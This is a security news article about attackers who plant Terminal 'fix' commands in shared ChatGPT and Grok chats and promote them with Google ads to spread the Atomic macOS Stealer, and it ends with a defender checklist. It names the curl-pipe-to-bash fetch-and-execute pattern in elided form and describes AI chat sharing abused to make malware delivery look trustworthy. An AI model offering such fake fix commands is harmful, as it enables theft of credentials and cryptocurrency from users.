Threat actors are abusing shareable ChatGPT and Grok conversations and pushing them with Google Search ads to trick macOS users into running Terminal commands that install the Atomic macOS Stealer (AMOS).
This campaign shows how attackers now blend social engineering with trusted platforms to make malware delivery look “normal.”
macOS infostealers have become a fast-growing underground business focused on stealing browser data, Keychain secrets, and especially cryptocurrency wallet access.
Flare reports that macOS stealer operators are targeting at least 103 Chrome cryptocurrency extensions, and they pair that theft with wallet-themed phishing for brands like Ledger, Trezor, and Exodus.
In the same reporting, a forum actor advertised a revenue-share model (50/50 for crypto theft) while offering partners full access to non-crypto stolen logs, highlighting how “affiliate” style distribution is now common.
How the Google Ads-to-AI trap works
In incidents analyzed by Malwarebytes, the infection chain began with a normal search query (for example, “clear disk space on macOS”) that led users to poisoned AI chat pages surfaced in search results and through advertising.
Those shared conversations presented step-by-step “fix” instructions that directed the victim to run a macOS Terminal command, which then resulted in AMOS infection.
Malwarebytes notes the command flow can include base64-decoding and downloading a malicious script (a “curl … | bash” style pattern), letting the attacker execute code without a typical app install review step.
The key twist is credibility: the malicious instructions are hosted on legitimate AI domains via public sharing links, and the traffic is boosted with sponsored placements that resemble real support results.
Flare similarly describes this as a ClickFix-style approach: post malicious instructions inside ChatGPT/Grok chats, then pay for visibility through Google Ads so victims encounter the “guide” first.
The AMOS distribution trend is landing at the same time as another macOS shift: malware increasingly arrives inside installers that look legitimate to Apple’s built-in checks.
Jamf reported MacSync samples delivered as signed and notarized Swift applications, with the Mach-O signed under Developer Team ID GNJLS3UYZ4 allowing the app to pass Gatekeeper at the time of analysis.
Flare’s write-up adds that these samples used large DMGs and decoy content, plus environment checks, to make analysis and detection harder.
What to watch for (defender checklist)
- Users or helpdesk staff copying “fix” commands from a web page into Terminal, especially commands that download and immediately execute scripts.
- Apps (even “signed” ones) unexpectedly prompting for passwords or access that doesn’t match the task the user is trying to do.
- Unusual outbound connections from non-financial apps to blockchain infrastructure, which Flare flags as a practical hunting signal for some infostealer activity.
For broader context, Google’s Threat Intelligence Group has also tracked financially motivated actors (UNC5142) compromising WordPress sites at scale and using “EtherHiding” (data stored in smart contracts on BNB Smart Chain) to support resilient malware distribution; as of June 2025 they identified roughly 14,000 infected pages with injected JavaScript consistent with this activity.
Taken together, these cases show a clear direction: modern macOS attacks don’t rely on obvious warnings they rely on trusted surfaces (ads, AI chats, notarization, and popular web platforms) to remove the last moments where a user might hesitate.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
